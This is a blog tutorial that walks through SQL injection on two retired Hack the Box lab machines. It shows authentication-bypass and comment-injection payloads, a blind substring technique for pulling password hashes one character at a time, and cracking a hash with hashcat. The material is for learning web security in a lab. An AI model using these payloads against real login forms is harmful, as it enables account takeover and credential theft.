Are you starting a new website or running one? How secure is it? In this article, we shall illustrate how a hacker can exploit SQL injection vulnerabilities to gain access to your site.

And if you are looking forward to starting your own website, you can use Hostinger for Premium Quality Web Hosting.

 

This is the first of many articles coming up soon. Today, I will focus on the basics of SQL Injection. I will be using the Hack the Box retired machines to draw the examples.

Example 1: Sneaky Machine

On visiting the site http://10.10.10.20, we see a simple page as below

The page source does not reveal much information either

From here the next approach is to run a quick directory search, ./dirsearch.py -u http://10.10.10.20 -e php Fortunately, this shows we have a dev directory as below.

On visiting the page, we are presented with a login form.

Since I see no hints on which application this is running I send this page over to burp suite. For every wrong username, password combination I keep getting a “404 error, not found”.

I try several combinations including something like ‘ “– -%$^@&@*@*kjld (500),'”” for the password and I note the error message changes.

With this insight, I head over to the SQL injection authentication bypass cheat sheet and try several items on the list. Interestingly, the value admin’ or ‘1’ = ‘1 gets us in. This works whether you pass the value on the username or the password field because 1 = 1 will always evaluate to true.

Example 2: Falafel Machine

On visiting the website, http://10.10.10.73, we see a login page. We test a quick login with admin/password combination and get an error message “Wrong identification: admin”

I send this over to burp and try several random username/password combinations. I notice the error message changes to “Try again,, ” for wrong usernames. Interestingly however when I add a database comment (username=admin’–+-) after the admin username, I see the “wrong identification: admin” error. This is juicy.
If we look back at what is happening, it is likely that the query running here looks something similar to “SELECT username FROM table_name where username = entered_value“. 

Let’s analyze this a bit:
If we enter admin, then the query will be like “SELECT username FROM table_name where username = admin and password = not_correct” => “wrong identification : admin”
If we comment out after admin, then the query will be like “SELECT username FROM table_name where username = admin'-- - /** Comment will start here and the rest is ignored**/ and password = not_correct” => “wrong identification : admin”
If we enter the wrong username, then the query will be like “SELECT username FROM table_name where username = not_correct and password = not_correct” => “Try again,, “

First of all, we have confirmed that the user admin exists. Secondly, we note that if the SQL command is correct, we will see the wrong identification error. Otherwise, we will see the try again error. The task is now to think about how to pull the admin password hash from the database. I came across the article from SQLShack where he clearly explains how to use the SQL substring function. Now the task is how to perform this and fetch the password hash one character at a time.

Something is striking from the article. See the below format:
SELECT FirstName, substring(firstname,1,5), lastname FROM Person.Person

I infer that if we provide the correct username, then we can be able to fetch the password one character at a time. The logic would be to loop through a list of characters and check if any matches the character on the database and then print that. The server-side language here is PHP, it makes sense to assume that the database is MySQL. If we carry on with the assumption, then the password hashes are usually in MD5 format, 32 characters in length. 

Now our query will look like this: “SELECT username and substring(password,value_from_loop_list,1) = 'value_from_loop_list'-- -
A python script as below:

Running this with the admin username returns the password hash: 0e462096931906507119562988736854. We can repeat the process and fuzz for more usernames. To save some time, we would find another user with the name Chris, we can then retrieve his password hash using our script above. This gives us d4ee02a22fc872e36d9e3751ba72ddc8.
We send the hash over to hashcat and the mode for MD5 is 0 command like “hashcat -m 0 d4ee02a22fc872e36d9e3751ba72ddc8 [the_wordlist_here] . 

We use the creds Chris/juggling and we are logged in:

Further References

Manual SQL Guide by Raj Chandel: https://www.hackingarticles.in/manual-sql-injection-exploitation-step-step/